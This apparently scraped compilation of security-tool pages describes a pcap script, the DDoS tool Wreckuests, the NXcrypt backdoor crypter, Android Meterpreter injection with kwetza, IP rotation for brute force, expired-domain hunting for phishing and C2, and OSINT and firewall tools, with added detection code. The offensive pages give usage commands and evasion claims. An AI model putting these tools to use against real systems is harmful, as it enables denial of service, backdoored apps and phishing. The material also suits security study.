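LINKTYPE_ETHERNET = 1


def pcap_global_header(snaplen=65535, linktype=LINKTYPE_ETHERNET):
    """magic, version 2.4, thiszone 0, sigfigs 0, snaplen, linktype."""
    return struct.pack("<IHHiIII", PCAP_MAGIC_NS, 2, 4, 0, 0, snaplen, linktype)


def pcap_record(ts_sec, ts_nsec, data):
    """Record header: seconds, fraction, captured length, original length; then the bytes."""
    if not 0 <= ts_nsec < 10 ** 9:
        raise ValueError("nanosecond remainder out of range")
    return struct.pack("<IIII", ts_sec, ts_nsec, len(data), len(data)) + data


def write_pcap(path, packets):
    """packets: iterable of (ts_sec, ts_nsec, frame_bytes), the split get_pkt_times returns."""
    with open(path, "wb") as fh:
        fh.write(pcap_global_header())
        for sec, nsec, data in packets:
            fh.write(pcap_record(sec, nsec, data))


def read_pcap(path):
    """Parse a little-endian pcap file; returns a list of (ts_sec, ts_nsec, frame_bytes)."""
    with open(path, "rb") as fh:
        blob = fh.read()
    if len(blob) < 24:
        raise ValueError("file shorter than a pcap global header")
    magic, = struct.unpack("<I", blob[:4])
    if magic == PCAP_MAGIC_NS:
        scale = 1
    elif magic == PCAP_MAGIC_US:
        scale = 1000           # microsecond file: normalise the fraction to nanoseconds
    else:
        raise ValueError("not a little-endian pcap file: 0x%08x" % magic)
    pos, out = 24, []
    while pos + 16 <= len(blob):
        sec, frac, incl, orig = struct.unpack("<IIII", blob[pos:pos + 16])
        pos += 16
        if incl > orig or pos + incl > len(blob):
            raise ValueError("truncated or corrupt record at offset %d" % pos)
        out.append((sec, frac * scale, blob[pos:pos + incl]))
        pos += incl
    return out


def roundtrip_demo():
    """Write two constructed frames to a temp file and read them back; returns (written, read)."""
    frames = [
        (1492713600, 123456789, bytes.fromhex("005056edfe68000c29aabbcc0800") + b"\x45" * 40),
        (1492713601, 5, b"\xff" * 60),
    ]
    fd, path = tempfile.mkstemp(suffix=".pcap")
    os.close(fd)
    try:
        write_pcap(path, frames)
        got = read_pcap(path)
    finally:
        os.remove(path)
    return frames, got


if __name__ == "__main__":
    written, read_back = roundtrip_demo()
    print("round trip intact:", written == read_back)
```

The range check in pcap_record is the one worth keeping in any wrapper: a remainder of 1 000 000 000 or more means the seconds/nanoseconds split was done wrong upstream, and most readers will silently accept the bogus timestamp.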


Wreckuests - Tool to run DDoS atacks with HTTP-flood


Wreckuests is a script that runs DDoS attacks with HTTP flood (GET/POST). It is written in pure Python and uses proxy servers as "bots". Of course, this script is not universal and you can't just take down the Pentagon/NSA/whatever website with one mouse click. Each attack is unique, and for each website you will need to search for weaknesses and exploit them, which might mean hardcoding, no sleep, etc. Yes, that is your dirty and ungrateful part of the job.
⚠️ Warning: This script is published for educational purposes only! Author will accept no responsibility for any consequence, damage or loss which might result from use.

Features
  • Cache bypass with random ?abcd=efg parameter
  • CloudFlare detection and notification
  • Automatic gzip/deflate toggling
  • HTTP Authentication bypass
  • UserAgent substitution
  • Referers randomizer
  • HTTP proxy support
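
A detection-side counterpart, as an added example that is not part of Wreckuests: the feature list above describes traffic that hits one path with a random ?abcd=efg parameter, rotates User-Agents and Referers, and arrives from many proxy addresses. The script parses constructed Apache combined-format log lines and flags paths whose traffic shows that pattern; the log lines, the source addresses and the thresholds are this example's own assumptions, to be tuned per site.

```python
"""Flag HTTP-flood traffic that uses random cache-busting query parameters.

Added example, not Wreckuests code. Scores each request path over the supplied
log lines: many distinct client IPs, a never-repeated single query string on
nearly every request, and several User-Agents at once.
"""
import random
import re
from collections import defaultdict

# Apache combined log format; constructed sample lines below follow it
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def parse_line(line):
    """Return a dict of fields with the request target split into path and query, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def flood_candidates(lines, min_requests=20, min_ips=5, min_unique_query_ratio=0.8, min_uas=3):
    """Return {path: stats} for paths whose traffic looks like a cache-bypass flood."""
    per_path = defaultdict(lambda: {"n": 0, "ips": set(), "queries": [], "uas": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_path[rec["path"]]
        s["n"] += 1
        s["ips"].add(rec["ip"])
        s["queries"].append(rec["query"])
        s["uas"].add(rec["ua"])
    flagged = {}
    for path, s in per_path.items():
        if s["n"] < min_requests:
            continue
        nonempty = [q for q in s["queries"] if q]
        unique_ratio = len(set(nonempty)) / s["n"]   # ~1.0 when every request carries a fresh parameter
        if len(s["ips"]) >= min_ips and unique_ratio >= min_unique_query_ratio and len(s["uas"]) >= min_uas:
            flagged[path] = {"requests": s["n"], "ips": len(s["ips"]),
                             "unique_query_ratio": round(unique_ratio, 2), "user_agents": len(s["uas"])}
    return flagged


def sample_log():
    """Constructed log: 30 flood requests to /heavy.php via 10 proxies, plus ordinary traffic."""
    rnd = random.Random(7)   # fixed seed so the sample is reproducible
    letters = "abcdefghijklmnopqrstuvwxyz"
    uas = ["Mozilla/5.0 (X11; Linux x86_64)", "Mozilla/5.0 (Windows NT 10.0)", "curl/7.58.0", "Opera/9.80"]
    lines = []
    for i in range(30):
        key = "".join(rnd.choice(letters) for _ in range(4))
        val = "".join(rnd.choice(letters) for _ in range(3))
        lines.append('203.0.113.%d - - [10/Oct/2000:13:55:%02d +0000] "GET /heavy.php?%s=%s HTTP/1.1" '
                     '200 51234 "https://example.net/%d" "%s"' % (i % 10 + 1, i % 60, key, val, i, uas[i % 4]))
    for i in range(10):
        lines.append('198.51.100.7 - - [10/Oct/2000:13:56:%02d +0000] "GET /index.html HTTP/1.1" 200 2048 '
                     '"-" "Mozilla/5.0 (X11; Linux x86_64)"' % i)
    return lines


if __name__ == "__main__":
    for path, stats in flood_candidates(sample_log()).items():
        print(path, stats)
```

The unique-query ratio is the discriminating signal: legitimate cache-busting (build hashes, tracking parameters) repeats values across clients, whereas a per-request random parameter never does, so a ratio near 1.0 across many source addresses is worth an alert even when each address alone stays under any per-IP rate limit.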

Dependencies

Installation
Installing Wreckuests takes just one command.

Ubuntu 16.04
apt-get update && apt-get dist-upgrade && apt-get install python3 && apt-get install python3-pip && pip3 install --upgrade pip && pip3 install requests && pip3 install netaddr
Note: pip3 may install requests 2.9.1. Just run pip3 install --upgrade requests to upgrade requests to the latest version.

Usage
Run as root (under sudo):
python3 wreckuests.py -v <target url> -a <login:pass> -t <timeout>


Possible parameters:
-h or --help:
Prints a message with possible parameters.
-v or --victim:
Specifies a link to a page on the victim's site. It could be the website's main page, someone's profile, a .php file or even an image: anything that is large or expensive for the server to serve. The choice is yours.
-a or --auth:
Parameter for bypassing authentication. Your victim may have enabled basic HTTP authentication, so the website asks you to enter a login and password in a popup window. The victim may previously have published the login and password for their users on VK/FB/Twitter or some other social network.
-t or --timeout (default: 10):
Parameter to control the connect and read timeout. This option also controls the termination time. Note: if you set timeout=1 or somewhere around 2-3 seconds, the slow (but still working) proxies will not have time to even connect to your victim's website and will never hit it. If you still do not understand how it works, do not change this option. This parameter also regulates the intensity of the requests you send, so if you are sure your proxies are fast enough you can reduce this value. Use it accordingly.

Important
A separate thread is created for each proxy address. The more proxies you use, the more threads you create. So, please, do not use far too many proxies; otherwise the script may exit abnormally with a segmentation fault.


NXcrypt - Python Backdoor Framework


NXcrypt
  • NXcrypt is a polymorphic 'python backdoors' crypter written in Python by Hadi Mene (h4d3s). The output is fully undetectable.
  • NXcrypt can inject a malicious Python file into a normal file with a multi-threading system.
  • Run it with superuser's permissions.
  • NXcrypt output is fully undetectable.

Usage :
  • sudo ./NXcrypt.py --file=backdoor.py --output=output_backdoor.py # encrypt backdoor.py and output file is output_backdoor.py
  • sudo ./NXcrypt.py --file=shell.py # encrypt shell.py and default output file is backdoor.py but you can edit it in source code
  • sudo ./NXcrypt.py --help # NXcrypt help
  • sudo ./NXcrypt.py --backdoor-file=payload.py --file=test.py --output=hacked.py # inject payload.py with test.py into hacked.py with multi-threading system

How does it work?
  • Encryption module:
  • NXcrypt adds some junk code.
  • NXcrypt uses the Python internal module 'py_compile', which compiles the code into bytecode in a .pyc file.
  • NXcrypt converts the .pyc file back into a normal .py file.
  • In this way the code is obfuscated.
  • The md5sum changes too.
  • Injection module:
  • It injects a malicious Python file into a normal file with a multi-threading system.

Test with Virustotal
Before :
SHA256: e2acceb6158cf406669ab828d338982411a0e5c5876c2f2783e247b3e01c2163 File name: facebook.py Detection ratio: 2 / 54
After :
SHA256: 362a4b19d53d1a8f2b91491b47dba28923dfec2d90784961c46213bdadc80add File name: facebook_encrypted.py Detection ratio: 0 / 55

Video Tutorial
https://www.youtube.com/watch?v=s8Krngv2z9Q


OpenSnitch - GNU/Linux port of the Little Snitch application firewall


OpenSnitch is a GNU/Linux port of the Little Snitch application firewall.

Requirements
You'll need a GNU/Linux distribution with iptables, NFQUEUE and ftrace kernel support.

Install
sudo apt-get install build-essential python3-dev python3-setuptools libnetfilter-queue-dev python3-pyqt5 python3-gi python3-dbus python3-pyinotify
cd opensnitch
sudo python3 setup.py install

Run
sudo -HE opensnitchd
opensnitch-qt

Known Issues / Future Improvements
Before opening an issue, keep in mind that the current implementation is just an experiment to test the feasibility of the project; future improvements of OpenSnitch will include:
Split the project into opensnitchd, opensnitch-ui and opensnitch-ruleman:
  • opensnitchd will be a (C++ ? TBD) daemon, running as root with the main logic. It'll fix this.
  • opensnitch-ui python (?) UI running as normal user, getting the daemon messages. Will fix this.
  • opensnitch-ruleman python (?) UI for rule editing.

How Does It Work
OpenSnitch is an application level firewall, meaning that while running it will detect and alert the user about every outgoing connection the applications they are running create. This can be extremely effective for detecting and blocking unwanted connections on your system that might be caused by a security breach, making data exfiltration much harder for an attacker. In order to do that, OpenSnitch relies on NFQUEUE, an iptables target/extension which allows userland software to intercept IP packets and either ALLOW or DROP them. Once started, it'll install the following iptables rules:
OUTPUT -t mangle -m conntrack --ctstate NEW -j NFQUEUE --queue-num 0 --queue-bypass
This uses the conntrack iptables extension to pass all packets of newly created connections to NFQUEUE number 0 (the one OpenSnitch is listening on), and then:
INPUT --protocol udp --sport 53 -j NFQUEUE --queue-num 0 --queue-bypass
This also redirects DNS traffic (replies arriving from source port 53) to OpenSnitch, allowing the software to perform IP -> hostname resolution without performing active DNS queries itself.
Once a new connection is detected, the software relies on the ftrace kernel extension to track which PID (and therefore which process) is creating the connection.
If ftrace is not available for your kernel, OpenSnitch will fall back to using the /proc filesystem. While this method also works, it is vulnerable to application path manipulation as described in this issue, so it is highly suggested to run OpenSnitch on an ftrace-enabled kernel.
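The /proc fallback described above, as an added example that is not OpenSnitch's own code: parse /proc/net/tcp for the socket inode of a new connection's 4-tuple, then walk /proc/<pid>/fd for the matching socket:[inode] link. The sample /proc/net/tcp text is constructed and assumes a little-endian host (the kernel prints IPv4 addresses as a native 32-bit hex integer).

```python
"""Added example, not OpenSnitch's own code: the /proc fallback the page
describes, attributing an outgoing TCP connection to the PID that owns it.

Assumption: the sample /proc/net/tcp text below is constructed and comes
from a little-endian host, where 0100007F denotes 127.0.0.1.
"""
import os
import socket
import struct
import sys

# Constructed sample of /proc/net/tcp: a LISTEN socket on 127.0.0.1:631 and
# one ESTABLISHED connection from 10.0.2.15:46498 to 93.46.12.14:443.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 16789 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:B5A2 0E0C2E5D:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 23456 1 0000000000000000 20 4 30 10 -1
"""

TCP_ESTABLISHED = 0x01


def _decode_addr(hex_addr, byteorder):
    """'0100007F:0277' -> ('127.0.0.1', 631) on a little-endian host."""
    ip_hex, port_hex = hex_addr.split(':')
    # The kernel formats the network-order address as a native integer, so
    # repacking it in the host's byte order restores the network-order bytes.
    fmt = '<I' if byteorder == 'little' else '>I'
    ip = socket.inet_ntoa(struct.pack(fmt, int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text, byteorder=sys.byteorder):
    """Parse /proc/net/tcp (IPv4 only) into a list of connection records."""
    entries = []
    for line in text.splitlines()[1:]:  # line 0 is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        entries.append({
            'local': _decode_addr(fields[1], byteorder),
            'remote': _decode_addr(fields[2], byteorder),
            'state': int(fields[3], 16),
            'uid': int(fields[7]),
            'inode': int(fields[9]),
        })
    return entries


def find_socket_inode(entries, local, remote):
    """Return the socket inode for an exact (local, remote) 4-tuple match."""
    for entry in entries:
        if entry['local'] == local and entry['remote'] == remote:
            return entry['inode']
    return None


def inode_to_pid(inode, proc_root='/proc'):
    """Walk /proc/<pid>/fd looking for a 'socket:[inode]' symlink target.
    Reading other users' fd directories needs root; returns None if unfound."""
    target = 'socket:[%d]' % inode
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        fd_dir = os.path.join(proc_root, name, 'fd')
        try:
            fds = os.listdir(fd_dir)
        except OSError:  # process exited, or not readable without root
            continue
        for fd in fds:
            try:
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    return int(name)
            except OSError:
                continue
    return None


def attribute_connection(local, remote, proc_root='/proc'):
    """Full fallback path: 4-tuple -> inode -> PID -> executable path.
    The page's caveat applies: the application path read from /proc can be
    manipulated by the application, which is why ftrace is preferred."""
    with open(os.path.join(proc_root, 'net', 'tcp')) as fh:
        entries = parse_proc_net_tcp(fh.read())
    inode = find_socket_inode(entries, local, remote)
    if inode is None:
        return None
    pid = inode_to_pid(inode, proc_root)
    if pid is None:
        return None
    try:
        exe = os.readlink(os.path.join(proc_root, str(pid), 'exe'))
    except OSError:
        exe = None
    return {'inode': inode, 'pid': pid, 'exe': exe}


if __name__ == '__main__':
    entries = parse_proc_net_tcp(SAMPLE_PROC_NET_TCP, 'little')
    for entry in entries:
        print(entry)
    print(find_socket_inode(entries, ('10.0.2.15', 46498), ('93.46.12.14', 443)))
```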


tcconfig - A Simple Tc Command Wrapper Tool


A Simple tc command wrapper tool. Easy to set up traffic control of network bandwidth/latency/packet-loss to a network interface.


Traffic control features

Traffic shaping target
Apply traffic shaping rules to specific target:
  • Outgoing/Incoming packets
  • Certain IP address/network or port

Available parameters
The following parameters can be set on network interfaces.
  • Network bandwidth rate [G/M/K bps]
  • Network latency [milliseconds]
  • Packet loss rate [%]
  • Packet corruption rate [%]

Usage

Set traffic control (tcset command)
tcset is a command to add a traffic control rule to a network interface (device).

e.g. Set a limit on bandwidth up to 100Kbps
# tcset --device eth0 --rate 100k

e.g. Set 100ms network latency
# tcset --device eth0 --delay 100

e.g. Set 0.1% packet loss
# tcset --device eth0 --loss 0.1

e.g. All of the above at once
# tcset --device eth0 --rate 100k --delay 100 --loss 0.1

e.g. Specify the IP address of traffic control
# tcset --device eth0 --delay 100 --network 192.168.0.10

e.g. Specify the IP network and port of traffic control
# tcset --device eth0 --delay 100 --network 192.168.0.0/24 --port 80

Delete traffic control (tcdel command)
tcdel is a command to delete traffic shaping rules from a network interface (device).

e.g. Delete traffic control of eth0
# tcdel --device eth0

Display traffic control configurations (tcshow command)
tcshow is a command to display the traffic control settings of network interface(s).

Example
# tcset --device eth0 --delay 10 --delay-distro 2  --loss 0.01 --rate 0.25M --network 192.168.0.10 --port 8080
# tcset --device eth0 --delay 1 --loss 0.02 --rate 500K --direction incoming
# tcshow --device eth0
{
    "eth0": {
        "outgoing": {
            "network=192.168.0.10/32, dst-port=8080": {
                "delay": "10.0",
                "loss": "0.01",
                "rate": "250K",
                "delay-distro": "2.0"
            },
            "network=0.0.0.0/0": {}
        },
        "incoming": {
            "network=0.0.0.0/0": {
                "delay": "1.0",
                "loss": "0.02",
                "rate": "500K"
            }
        }
    }
}

For more information
More examples are available at http://tcconfig.rtfd.io/en/latest/pages/usage/index.html

Installation

Installing from PyPI
tcconfig can be installed from PyPI via pip (Python package manager) command.
sudo pip install tcconfig

Installing from files
The following package includes tcconfig and its dependency packages. This package is for environments that cannot access PyPI directly.
How to install:
  1. Navigate to https://github.com/thombashi/tcconfig/releases/
  2. Download the latest version of tcconfig_wheel.tar.gz
  3. Copy tcconfig_wheel.tar.gz to installation target
  4. tar xvf tcconfig_wheel.tar.gz
  5. cd tcconfig_wheel/
  6. ./install.sh

Dependencies

Linux packages
  • iproute/iproute2 (mandatory: required for tc command)
  • iptables (optional: required when you use the --iptables option)

Linux kernel module
  • sch_netem

Python packages
Dependency python packages are automatically installed during tcconfig installation via pip.

Optional
  • netifaces
    • Suppress excessive error messages if this package is installed

Test dependencies

Documentation
http://tcconfig.rtfd.io/


Troubleshooting
http://tcconfig.readthedocs.io/en/latest/pages/troubleshooting.html


Belati - The Traditional Swiss Army Knife for OSINT


Belati is a tool for collecting public data and public documents from websites and other services for OSINT purposes. This tool is inspired by FOCA and Datasploit.

What Belati can do?
  • Whois(Indonesian TLD Support)
  • Banner Grabbing
  • Subdomain Enumeration
  • Service Scanning for all Subdomain Machine
  • Web Appalyzer Support
  • DNS mapping / Zone Scanning
  • Mail Harvester from Website & Search Engine
  • Mail Harvester from MIT PGP Public Key Server
  • Scraping Public Documents for a Domain from Search Engines
  • Fake and Random User Agent ( Prevent from blocking )
  • Proxy Support for Harvesting Emails and Documents
  • Public Git Finder in domain/subdomain
  • Public SVN Finder in domain/subdomain
  • robots.txt Scraper in domain/subdomain
  • Gather Public Company Info & Employee
  • SQLite3 Database Support for storing Belati Results
  • Setup Wizard/Configuration for Belati

TODO
  • Automatic OSINT with Username and Email support
  • Organization or Company OSINT Support
  • Collecting Data from Public service with Username and Email for LinkedIn and other service.
  • Setup Wizard for Token and setting up Belati
  • Token Support
  • Email Harvesting with multiple content(github, linkedin, etc)
  • Scraping Public Documents with multiple search engines (Yahoo, Yandex, Bing, etc.)
  • Metadata Extractor
  • Web version with Django
  • Scanning Report export to PDF
  • domain or subdomain reputation checker
  • Reporting Support to JSON, PDF
  • Belati Updater

Install/Usage
git clone https://github.com/aancw/Belati.git
cd Belati
git submodule update --init --recursive --remote
pip install -r requirements.txt #please use pip with python v2
sudo su
python Belati.py --help

Tested On
Ubuntu 16.04 x86_64 Arch Linux x86_64 CentOS 7

Python Requirements
This tool is not compatible with Python 3, so use Python 2.7 instead!

Why Need Root Privilege?
Nmap needs root privileges. You can use sudo or another way to run nmap without root privileges. It's your choice ;)
Reference -> https://secwiki.org/w/Running_nmap_as_an_unprivileged_user
Don't worry, Belati still runs when you run it as a normal user ;)

Dependencies
  • urllib2
  • dnspython
  • requests
  • argparse
  • texttable
  • python-geoip-geolite2
  • python-geoip
  • dnsknife
  • termcolor
  • colorama
  • validators
  • tqdm
  • tldextract
  • fake-useragent

System Dependencies
For CentOS/Fedora user, please install this:
yum install gcc gmp gmp-devel python-devel

Library
  • python-whois
  • Sublist3r
  • Subbrute
  • nmap
  • git
  • sqlite3

Notice
This tool is for educational purposes only. The author is not responsible for any damage you cause. Use it at your own risk!

Author
Aan Wahyu a.k.a Petruknisme(https://petruknisme.com)


pymultitor - Python Multi Threaded Tor Proxy


Did you ever want to be at two different places at the same time?
While performing penetration tests there are often problems caused by security devices that block the "attacking" IP.
With a large number of IP addresses performing the attacks, better results are guaranteed - especially when attempting attacks to bypass Web Application Firewalls, Brute-Force type attacks and many more.

[Blackhat Asia] https://www.blackhat.com/asia-17/arsenal.html#pymultitor
[Owasp-IL Presentation] https://www.owasp.org/images/3/3d/OWASPIL-2016-02-02_PyMultiTor_TomerZait.pdf
[DigitalWhisper Article (Hebrew)] http://www.digitalwhisper.co.il/files/Zines/0x2E/DW46-3-PyMultitor.pdf

Installation

Prerequisites
  • Python 2.7+.
  • A C compiler, Python headers, etc. (are needed to compile several dependencies).
    • On Ubuntu, sudo apt-get install -y build-essential libssl-dev python-setuptools python-pip python-wheel python-dev
    • On Fedora, sudo dnf install -y redhat-rpm-config gcc gcc-c++ make openssl-devel python-setuptools python-pip python-wheel python-devel
    • On Windows, install http://aka.ms/vcpython27
    • On MacOS,
      • install xcode command line tools: xcode-select --install
      • install homebrew(brew): $(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
  • mitmproxy dependencies.
    • On Ubuntu, sudo apt-get install -y libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
    • On Fedora, sudo dnf install -y libffi-devel openssl-devel libxml2-devel libxslt-devel libpng-devel libjpeg-devel
    • On Windows,
    • On MacOS, brew install mitmproxy
  • tor.
    • On Ubuntu, sudo apt-get install -y tor
    • On Fedora, sudo dnf install -y tor
    • On Windows,
      • download tor expert bundle: https://www.torproject.org/download/download.html.en
      • insert tor to your path environment: {tor-win32-*_path}\Tor
      • if you don't know how, note the tor.exe path and use the --tor-cmd argument of pymultitor (for example: pymultitor --tor-cmd "c:\Pentest\Web\tor-win32-0.2.9.9\Tor\tor.exe")
    • On MacOS, brew install tor

From pip
pip install pymultitor
# On MacOs (it's Easier To Use Python 3):
# pip3 install pymultitor
You may need to use sudo, depending on your Python installation.

From Source
git clone https://github.com/realgam3/pymultitor.git
cd pymultitor

# Install python dependencies.
# Depending on your setup, one or both of these may require sudo.
pip install -r requirements.txt
python setup.py install

# On MacOs (it's Easier To Use Python 3):
# pip3 install -r requirements.txt
# python3 setup.py install

# Confirm that everything works
pymultitor --help
Bug reports on installation issues are welcome!

Usage

Basic Usage
  1. Run pymultitor --on-string "Your IP Address Blocked".
  2. In your script, use the proxy (http://127.0.0.1:8080).
    When the string "Your IP Address Blocked" is present in the response content, you will exit from another IP address.

Command Line Flags
See --help for the complete list, but in short:
Usage: pymultitor [-h] [-v] [-lh LISTEN_HOST] [-lp LISTEN_PORT] [-s] [-i] [-d]
[-p PROCESSES] [-c CMD] [--on-count ON_COUNT]
[--on-string ON_STRING] [--on-regex ON_REGEX] [--on-rst]

# When To Change IP Address
--on-count Change IP Every x Requests (Resources Also Counted).
--on-string Change IP When String Found On The Response Content.
--on-regex Change IP When Regex Found On The Response Content.
--on-rst Change IP When Connection Closed With TCP RST.


Domain Hunter - Checks Expired Domains, Bluecoat Categorization, And Archive.Org History To Determine Good Candidates For Phishing


Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly, domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.
This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like BlueCoat and IBM X-Force. The primary tool output is a timestamped HTML table style report.

Changes
- June 6 2017
+ Added python 3 support
+ Code cleanup and bug fixes
+ Added Status column (Available, Make Offer, Price,Backorder,etc)

Features
  • Retrieves specified number of recently expired and deleted domains (.com, .net, .org primarily)
  • Retrieves available domains based on keyword search
  • Reads line delimited input file of potential domains names to check against reputation services
  • Performs reputation checks against the Blue Coat Site Review and IBM x-Force services
  • Sorts results by domain age (if known)
  • Text-based table and HTML report output with links to reputation sources and Archive.org entry

Usage
Install Requirements
pip install -r requirements.txt
or
pip install requests texttable beautifulsoup4 lxml
List DomainHunter options
python ./domainhunter.py
usage: domainhunter.py [-h] [-q QUERY] [-c] [-r MAXRESULTS] [-w MAXWIDTH]

Checks expired domains, bluecoat categorization, and Archive.org history to
determine good candidates for C2 and phishing domains

optional arguments:
-h, --help show this help message and exit
-q QUERY, --query QUERY
Optional keyword used to refine search results
-c, --check Perform slow reputation checks
-r MAXRESULTS, --maxresults MAXRESULTS
Number of results to return when querying latest
expired/deleted domains (min. 100)
Use defaults to check for most recent 100 domains and check reputation
python ./domainhunter.py
Search for 1000 most recently expired/deleted domains, but don't check reputation against Bluecoat or IBM xForce
python ./domainhunter.py -r 1000 -n
Retrieve reputation information for domains in an input file
python ./domainhunter.py -f <filename>
Search for available domains with search term of "dog" and max results of 100
./domainhunter.py -q dog -r 100 -c
____ ___ __ __ _ ___ _ _ _ _ _ _ _ _ _____ _____ ____
| _ \ / _ \| \/ | / \ |_ _| \ | | | | | | | | | \ | |_ _| ____| _ \
| | | | | | | |\/| | / _ \ | || \| | | |_| | | | | \| | | | | _| | |_) |
| |_| | |_| | | | |/ ___ \ | || |\ | | _ | |_| | |\ | | | | |___| _ <
|____/ \___/|_| |_/_/ \_\___|_| \_| |_| |_|\___/|_| \_| |_| |_____|_| \_\

Expired Domains Reputation Checker

DISCLAIMER:
This is for educational purposes only!
It is designed to promote education and the improvement of computer/cyber security.
The authors or employers are not liable for any illegal act or misuse performed by any user of this tool.
If you plan to use this content for illegal purpose, don't. Have a nice day :)

********************************************
Start Time: 20170301_113226
TextTable Column Width: 400
Checking Reputation: True
Number Domains Checked: 100
********************************************
Estimated Max Run Time: 33 minutes

[*] Downloading malware domain list from http://mirror1.malwaredomains.com/files/justdomains
[*] Fetching expired or deleted domains containing "dog"...
[*] https://www.expireddomains.net/domain-name-search/?q=dog
[*] BlueCoat Check: Dog.org.au
[+] Dog.org.au is categorized as: Uncategorized
[*] IBM xForce Check: Dog.org.au
[+] Dog.org.au is categorized as: Not found.
[*] BlueCoat Check: Dog.asia
[+] Dog.asia is categorized as: Uncategorized
[*] IBM xForce Check: Dog.asia
[+] Dog.asia is categorized as: Not found.
[*] BlueCoat Check: HomeDog.net
[+] HomeDog.net is categorized as: Uncategorized
[*] IBM xForce Check: HomeDog.net
[+] HomeDog.net is categorized as: Not found.
[*] BlueCoat Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Uncategorized
[*] IBM xForce Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Not found.
[*] BlueCoat Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Uncategorized
[*] IBM xForce Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Not found.
[*] https://www.expireddomains.net/domain-name-search/?start=25&q=dog
[*] BlueCoat Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: Society/Daily Living
[*] IBM xForce Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: {u'General Business': True}

Report Header Reference
  • Domain: Target Domain
  • Birth: First seen on Archive.org
  • Entries: Number of entries in Archive.org
  • TLDs Available: Top level top available
  • Bluecoat Categorization: Bluecoat category
  • IBM-xForce Categorization: IBM-xForce category
  • WatchGuard: Watchguard reputation
  • Namecheap: Link to namecheap.com
  • Archive.org: Link to archive.org


kwetza - Python script to inject existing Android applications with a Meterpreter payload


Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.

What does it do?
Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application's default permissions or inject additional permissions to gain additional functionality.

Getting the code
Firstly get the code:
git clone https://github.com/sensepost/kwetza.git
Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip:
pip install beautifulsoup4
Kwetza requires Apktool to be installed and accessible via your PATH. This can be set up using the install instructions located here: https://ibotpeaches.github.io/Apktool/install

Usage
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
  • nameOfTheApkToInfect.apk = name of the APK you wish to infect.
  • LHOST = IP of your listener.
  • LPORT = port of your listener.
  • yes/no = "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.
python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Information
Kwetza has been developed to work with Python 2.
Kwetza by default will use the template and keystore located in the folder "payload" to inject and sign the infected apk.
If you would like to sign the infected application with your own certificate, generate a new keystore and place it in the "payload" folder and rename to the existing keystore or change the reference in the kwetza.py.
The same can be done for payload templates.
The password for the default keystore is, well, "password".


DATA - Credential Phish Analysis and Automation


Credential Phish Analysis and Automation

BUCKLEGRIPPER (py)
  • Given a suspected phishing url or file of line separated urls, visit, screenshot, and scrape for interesting files.
  • Requirements can be installed by running or reviewing install_bucklegripper_deps.sh
usage: bucklegripper.py [-h] [-u URL] [-s SOURCE] [-r READFILE] [-a USERAGENT]

Visit a suspected phishing page, screenshot it and pillage it for phishing
archives

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Url to visit
-s SOURCE, --source SOURCE
Apply a source to where this url came from
-r READFILE, --readfile READFILE
Read in a file of URLs one per line
-a USERAGENT, --useragent USERAGENT
Custom User-Agent
Example of reading in a single url
$ python bucklegripper.py -s openphish -u http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html 

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Processing http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html
